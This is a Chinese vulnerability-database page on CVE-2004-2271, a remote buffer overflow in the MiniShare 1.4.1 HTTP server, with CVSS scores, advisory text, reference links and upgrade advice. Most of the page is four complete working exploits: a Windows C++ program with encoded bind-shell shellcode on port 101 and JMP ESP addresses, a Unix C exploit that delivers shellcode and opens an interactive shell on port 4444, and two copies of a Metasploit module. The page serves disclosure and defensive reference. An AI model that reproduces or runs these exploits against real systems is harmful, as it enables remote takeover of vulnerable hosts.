CVE-2004-2271
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:43:40
NMCOEPS    

[原文]Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.


[CNNVD]MiniShare超长URL处理远程任意指令执行漏洞(CNNVD-200412-1075)

        
        MiniShare是一款文件共享系统。
        MiniShare对超长URL请求处理不正确,远程攻击者可以利用这个漏洞对服务程序进行缓冲区溢出,可能以进程权限执行任意指令。
        攻击者提交超长的HTTP GET请求,可发生缓冲区溢出,尽心构建提交数据可能以进程权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2271
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2271
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1075
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/11530
(PATCH)  OSVDB  11530
http://sourceforge.net/project/shownotes.php?release_id=241158
(PATCH)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=241158
http://secunia.com/advisories/13114
(VENDOR_ADVISORY)  SECUNIA  13114
http://xforce.iss.net/xforce/xfdb/17978
(UNKNOWN)  XF  minishare-address-link-bo(17978)
http://www.securityfocus.com/bid/11620
(UNKNOWN)  BID  11620
http://www.securiteam.com/exploits/6X00B1PBPC.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/6X00B1PBPC.html
http://securitytracker.com/id?1012106
(UNKNOWN)  SECTRACK  1012106
http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html
(VENDOR_ADVISORY)  FULLDISC  20041107 [New VULNERABILTY + Exploit] MiniShare, Minimal HTTP Server for Windows, Remote Buffer Overflow Exploit

- 漏洞信息

MiniShare超长URL处理远程任意指令执行漏洞
高危 边界条件错误
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        MiniShare是一款文件共享系统。
        MiniShare对超长URL请求处理不正确,远程攻击者可以利用这个漏洞对服务程序进行缓冲区溢出,可能以进程权限执行任意指令。
        攻击者提交超长的HTTP GET请求,可发生缓冲区溢出,尽心构建提交数据可能以进程权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        MiniShare
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://minishare.sourceforge.net/

- 漏洞信息 (616)

MiniShare <= 1.4.1 Remote Buffer Overflow Exploit (EDBID:616)
windows remote
2004-11-07 Verified
80 class101
N/A [点击下载]
/*



MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1.
Bind a shellcode to the port 101.

Full disclosure and exploit 
by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
07 november 2004

Thanx to HDMoore and Metasploit.com for their kickass ASM work.


------------------
WHAT IS MINISHARE
------------------

Homepage - http://minishare.sourceforge.net/
	
	MiniShare is meant to serve anyone who has the need to share files to anyone,
	doesn't have a place to store the files on the web, 
    and does not want or simply does not have the skill
	and possibility to set up and maintain a complete HTTP-server software...

--------------
VULNERABILITY
--------------

	A simple buffer overflow in the link length, nothing more
	read the code for further instructions.

----
FIX
----

	Actually none, the vendor is contacted the same day published, 1 hour before you.
    As a nice fuck to NGSS , iDEFENSE and all others private disclosures
	homo crew ainsi que K-OTiK, ki se tap' des keu dans leur "Lab"
	lol :->

----
EXTRA
----
   
	Update the JMP ESP if you need. A wrong offset will crash minishare.
	Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English
	Others MiniShare's versions aren't tested.
    Tip: If it crashes for you , try to play with Sleep()...

----
BY
----

    class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
						 who
						greets
    DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet

*/




#include "winsock2.h"
#include "fstream.h"

#pragma comment(lib, "ws2_32")




//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore. 

char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

/*

//116 bytes, execute regedit.exe, XORed 0x88, hardcoded WinXP SP1 English

char scode+[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\xDD\x01\x6D\x09\x64\xC4\x88\x88\x88\xDB\x05\xF5\x3C\x4E\xCD\x7C\xFA\x4E\xCD"
"\x7D\xED\x4E\xCD\x7E\xEF\x4E\xCD\x7F\xED\x4E\xCD\x70\xEC\x4E\xCD\x71\xE1\x4E\xCD"
"\x72\xFC\x4E\xCD\x73\xA6\x4E\xCD\x74\xED\x4E\xCD\x75\xF0\x4E\xCD\x76\xED\x4E\xCD"
"\x77\x88\xE0\x8D\x88\x88\x88\x05\xCD\x7C\xD8\x30\xE8\x75\x6E\xFF\x77\x58\xE0\x89"
"\x88\x88\x88\x30\xEB\x10\x6F\xFF\x77\x58\x68\x61\x63\x6B\x90";

//565 bytes, execute regedit.exe, alphanumeric, hardcoded WinXP SP1 English

char scode+[]=
"LLLLYhbSgCX5bSgCHQVPPTQPPaRVVUSBRDJfh2ADTY09VQa0tkafhXMfXf1Dkbf1TkbjgY0Lkd0TkdfhH"
"CfYf1LkfjiY0Lkh0tkjjOX0Dkkf1TkljxY0Lko0Tko0TkqjfY0Lks0tks0Tkuj1Y0Lkw0tkw0tkyCjyY0"
"Lkz0TkzCC0tkzCCjmY0Lkz0TkzCC0TkzCCjhX0Dkz0tkzCC0tkzCCjPX0Dkz0TkzCC0tkzCCjfY0Lkz0T"
"kzCjjX0DkzC0TkzCCjeX0Dkz0tkzCC0TkzCCjvX0Dkz0tkzCC0TkzCCj3X0Dkz0tkzCC0tkzCCjOX0Dkz"
"0tkzCjaX0DkzCChuucTX1DkzCCCC0tkzCCjaY0Lkz0TkzCC0tkzCjRY0LkzCfhNUfXf1Dkzf1TkzCCCfh"
"hhfYf1Lkzf1TkzCCChS4ciX1DkzCCCC0TkzCC0tkzCjKY0Lkz0TkzCCfhzhfXf1Dkzf1TkzUvB3tLHCiS"
"r2K9Esr9Ele9E8g9Eqe9Ejd9Eni9EUt9EbD9Efe9Etx9E2e9EOahpucTrEjPG2LLwhGhR4ciGcgSwzG";

*/

static char payload[5000];

char espxp1en[]="\x33\x55\xdc\x77"; //JMP ESP - user32.dll   - WinXP SP1 English
char esp2k4en[]="\xb8\x9e\xe3\x77"; //JMP ESP - user32.dll   - Win2k SP4 English
char espnt6en[]="\xf8\x29\xf3\x77"; //JMP ESP - kernel32.dll - WinNT SP6 English

void usage(char* us);
WSADATA wsadata;
void ver();

int main(int argc,char *argv[])
{
	ver();
	if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;}
	if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
	int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, sizeB, sizeC, a, b, c;
	char *target, *os;
	if (argc==4){port=atoi(argv[3]);}
	else port=80;
	if (atoi(argv[1]) == 1){target=espxp1en;os="WinXP SP1 English";}
	if (atoi(argv[1]) == 2){target=esp2k4en;os="Win2k SP4 English";}
	if (atoi(argv[1]) == 3){target=espnt6en;os="WinNT SP6 English";}
	SOCKET s;
	struct fd_set mask;
	struct timeval timeout; 
	struct sockaddr_in server;
	s=socket(AF_INET,SOCK_STREAM,0);
	if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
	cout<<"[+] target: "<<os<<endl;			
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ip);
	server.sin_port=htons(port);
	WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
	timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
	switch(select(s+1,NULL,&mask,NULL,&timeout))
	{
		case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
		case 0: {cout<<"[+] connection failed."<<endl;closesocket(s);return -1;}
		default:
		if(FD_ISSET(s,&mask))
		{
			cout<<"[+] connected, constructing the payload..."<<endl;
			Sleep(1000);
			sizeA=1787;
			sizeB=414-sizeof(scode);
			sizeC=10;
			sz=sizeA+sizeB+sizeC+sizeof(scode)+17;
			memset(payload,0,sizeof(payload));
			strcat(payload,"GET ");
			for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
			strcat(payload,target);
			for (b=0;b<sizeB;b++){strcat(payload,"\x41");}
			strcat(payload,scode);
			for (c=0;c<sizeC;c++){strcat(payload,"\x41");}
			strcat(payload," HTTP/1.1\r\n\r\n");
			Sleep(1000);
		    if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
			Sleep(1000);
			cout<<"[+] size of payload: "<<sz<<endl;			
			cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
			return 0;
		}
	}
	closesocket(s);
	WSACleanup();
	return 0;
}


void usage(char* us) 
{  
	cout<<"USAGE: 101_mini.exe Target Ip Port\n"<<endl;
	cout<<"TARGETS:                               "<<endl;
	cout<<"      [+] 1. WinXP SP1 English (*)"<<endl;
	cout<<"      [+] 2. Win2k SP4 English (*)"<<endl;
	cout<<"      [+] 3. WinNT SP6 English (*)"<<endl;
	cout<<"NOTE:                               "<<endl;
	cout<<"      The port 80 is default if no port specified"<<endl;
	cout<<"      The exploit bind a shellcode to the port 101"<<endl;
	cout<<"      A wildcard (*) mean Tested."<<endl;
	return;
} 

void ver()
{	
cout<<endl;
cout<<"                                                                   "<<endl;
cout<<"        ===================================================[v0.1]===="<<endl;
cout<<"        ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1====="<<endl; 
cout<<"        =============Remote Buffer Overflow Exploit=================="<<endl;
cout<<"        ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl;
cout<<"        ============================================================="<<endl;
cout<<"                                                                   "<<endl;
}

// milw0rm.com [2004-11-07]
		

- 漏洞信息 (636)

MiniShare Remote Buffer Overflow Exploit (c source) (EDBID:636)
windows remote
2004-11-16 Verified
80 NoPh0BiA
N/A [点击下载]
/*
no@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2

***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***

[x] Connected to: 10.20.30.2 on port 80.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 4444..
[x] 0wn3d!

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

E:\Program Files\MiniShare>

Greetz to NtWaK0,kane,kamalo,foufz, and schap :)
http://NoPh0BiA.lostspirits.org

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <netinet/in.h>
#include <fcntl.h>

#define PORT 80
#define PORT1 4444
#define RET "\xB8\x9E\xE3\x77" /*2k sp2*/

char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\x34\x0a\x7c\xa8\x62"
"\x5d\xa4\x91\x10\x12\xa4\xb8\x08\x81\x7b\xf8\x4c\x0b\xc5\x76\x7e"
"\x12\xa4\xa7\x14\x0b\xc4\x1e\x06\x43\xa4\xc9\xbf\x0b\xc1\xcc\xcb"
"\xf6\x1e\x3d\x98\x32\xcf\x89\x33\xcb\xe0\xf0\x35\xcd\xc4\x0f\x0f"
"\x76\x0b\xe9\x41\xeb\xa4\xa7\x10\x0b\xc4\x9b\xbf\x06\x64\x76\x6e"
"\x16\x2e\x16\xbf\x0e\xa4\xfc\xdc\xe1\x2d\xcc\xf4\x55\x71\xa0\x6f"
"\xc8\x27\xfd\x6a\x60\x1f\xa4\x50\x81\x36\x76\x6f\x06\xa4\xa6\x28"
"\x81\x34\x76\x6f\x02\x7c\x95\xba\x44\x21\x11\xcb\xdc\xa6\x3a\xb5"
"\xe6\x2f\xfc\x34\x0a\x78\xab\x67\x83\xca\x15\x13\x0a\x2f\xfd\xa4"
"\x0b\x2f\xfd\x82\x13\x37\x1a\x90\x13\x5f\x14\xd1\x43\xa9\xb4\x90"
"\x10\x5f\x3a\x90\xa7\x01\x14\xed\x03\xda\x50\xff\xe7\xd3\xc6\x63"
"\x59\x1d\xa2\x07\x38\x2f\xa6\xb9\x41\x0f\xac\xcb\xdd\xa6\x22\xbd"
"\xc9\xa2\x88\x20\x60\x28\xa4\x65\x59\xd0\xc9\xbb\xf5\x7a\xf9\x6d"
"\x83\x2b\x73\xd6\xf8\x04\xda\x60\xf5\x18\x02\x61\x3a\x1e\x3d\x64"
"\x5a\x7f\xad\x74\x5a\x6f\xad\xcb\x5f\x03\x74\xf3\x3b\xf4\xae\x67"
"\x62\x2d\xfd\x25\x56\xa6\x1d\x5e\x1a\x7f\xaa\xcb\x5f\x0b\xae\x63"
"\xf5\x7a\xd5\x67\x5e\x78\x02\x61\x2a\xa6\x3a\x5c\x49\x62\xb9\x34"
"\x83\xcc\x7a\xce\x3b\xef\x70\x48\x2e\x83\x97\x21\x53\xdc\x56\xb3"
"\xf0\xac\x11\x60\xcc\x6b\xd9\x24\x4e\x49\x3a\x70\x2e\x13\xfc\x35"
"\x83\x53\xd9\x7c\x83\x53\xd9\x78\x83\x53\xd9\x64\x87\x6b\xd9\x24"
"\x5e\x7f\xac\x65\x5b\x6e\xac\x7d\x5b\x7e\xae\x65\xf5\x5a\xfd\x5c"
"\x78\xd1\x4e\x22\xf5\x7a\xf9\xcb\xda\xa6\x1b\xcb\x7f\x2f\x95\x99"
"\xd3\x2a\x33\xcb\x5f\x2b\x74\xf7\x60\xd0\x02\x02\xf5\xfc\x02\x41"
"\x0a\x47\x0d\xbe\x0e\x70\x02\x61\x0e\x1e\x26\x67\xf5\xff\xfd";

struct sockaddr_in hrm;

void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;

while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);

if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}

if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}

int conn(char *ip, int p)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(p);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr))) < 0 )
{
perror("connect");
exit(0);
}
return sockfd;
}

int main(int argc, char *argv[])
{
if(argc < 2)
{
printf("Usage: TARGET.\n");
exit(0);
}
char *buffer = malloc(2220),*B=malloc(30),*target=argv[1];
int x,y;
printf("\n***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***\n\n");
memset(buffer,'\0',2220);
memset(B,0x42,30);
memset(buffer,0x41,1787);
strcat(buffer,RET);
strcat(buffer,B);
strcat(buffer,shellcode);
if((x = conn(target,PORT)))
printf("[x] Connected to: %s on port %d.\n",target,PORT);
sleep(3);
printf("[x] Sending bad code..");
write(x,"GET ",4);
write(x,buffer,2220);
write(x," HTTP/1.1\r\n\r\n",13);
sleep(3);
printf("done.\n");
printf("[x] Trying to connect to: %s on port %d..\n",target,PORT1);
if((y=conn(target,PORT1)))
{
printf("[x] 0wn3d!\n\n");
shell(y);
}

}

// milw0rm.com [2004-11-16]
		

- 漏洞信息 (16754)

Minishare 1.4.1 Buffer Overflow (EDBID:16754)
windows remote
2010-05-09 Verified
80 metasploit
N/A [点击下载]
##
# $Id: minishare_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Minishare 1.4.1 Buffer Overflow',
			'Description'    => %q{
					This is a simple buffer overflow for the minishare web
				server. This flaw affects all versions prior to 1.4.2. This
				is a plain stack buffer overflow that requires a "jmp esp" to reach
				the payload, making this difficult to target many platforms
				at once. This module has been successfully tested against
				1.4.1. Version 1.3.4 and below do not seem to be vulnerable.
			},
			'Author'         => [ 'acaro <acaro@jervus.it>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2004-2271'],
					[ 'OSVDB', '11530'],
					[ 'BID', '11620'],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
					'MinNops'  => 64,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp
					['Windows 2000 SP4 English',     { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp
					['Windows XP SP0-SP1 English',   { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret
					['Windows XP SP2 English',       { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret
					['Windows 2003 SP0 English',     { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret
					['Windows NT 4.0 SP6',           { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp
					['Windows XP SP2 German',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
					['Windows XP SP2 Polish',        { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
					['Windows XP SP2 French',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
				],
			'DisclosureDate' => 'Nov 7 2004'))
	end

	def exploit
		uri = rand_text_alphanumeric(target['Rets'][0])
		uri << [target['Rets'][1]].pack('V')
		uri << payload.encoded

		print_status("Trying target address 0x%.8x..." % target['Rets'][1])
		send_request_raw({
			'uri' => uri
		}, 5)

		handler
	end

end
		

- 漏洞信息 (F82959)

Minishare 1.4.1 Buffer Overflow (PacketStormID:F82959)
2009-11-26 00:00:00
acaro  metasploit.com
exploit,web,overflow
CVE-2004-2271
[点击下载]

This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack overflow that requires a "jmp esp" to reach the payload, making this difficult to target many platforms at once. This Metasploit module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Minishare 1.4.1 Buffer Overflow',
			'Description'    => %q{
				This is a simple buffer overflow for the minishare web
				server. This flaw affects all versions prior to 1.4.2. This
				is a plain stack overflow that requires a "jmp esp" to reach
				the payload, making this difficult to target many platforms
				at once. This module has been successfully tested against
				1.4.1. Version 1.3.4 and below do not seem to be vulnerable.
					
			},
			'Author'         => [ 'acaro <acaro@jervus.it>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2271'],
					[ 'OSVDB', '11530'],
					[ 'BID', '11620'],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
					'MinNops'  => 64,
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp
					['Windows 2000 SP4 English',     { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp
					['Windows XP SP0-SP1 English',   { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret
					['Windows XP SP2 English',       { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret
					['Windows 2003 SP0 English',     { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret
					['Windows NT 4.0 SP6',           { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp
					['Windows XP SP2 German',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
					['Windows XP SP2 Polish',        { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp
					['Windows XP SP2 French',        { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp
				],
			'DisclosureDate' => 'Nov 7 2004'))
	end

	def exploit
		uri = rand_text_alphanumeric(target['Rets'][0])
		uri << [target['Rets'][1]].pack('V')
		uri << payload.encoded
		
		print_status("Trying target address 0x%.8x..." % target['Rets'][1])
		send_request_raw({
			'uri' => uri
		}, 5)
			
		handler
	end

end
    

- 漏洞信息

11530
MiniShare HTTP GET Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in MiniShare. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted HTTP GET request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-11-07 Unknow
2004-11-07 Unknow

- 解决方案

Upgrade to version 1.4.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

MiniShare Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 11620
Yes No
2004-11-08 12:00:00 2008-12-29 09:22:00
This vulnerability was disclosed by "class 101" <class101@phreaker.net>.

- 受影响的程序版本

MiniShare Minimal HTTP Server 1.4.1

- 漏洞讨论

MiniShare is prone to a remote buffer-overflow vulnerability because it fails to sufficiently verify buffer boundaries before copying user-supplied data.

Exploiting this vulnerability allows remote attackers to execute arbitrary code in the context of the affected application.

MiniShare 1.4.1 is reported vulnerable; other versions may also be affected.

- 漏洞利用

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Proof-of-concept exploits are available, including an exploit for the Metasploit Framework (minishare_get_overflow.pm).

- 解决方案

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站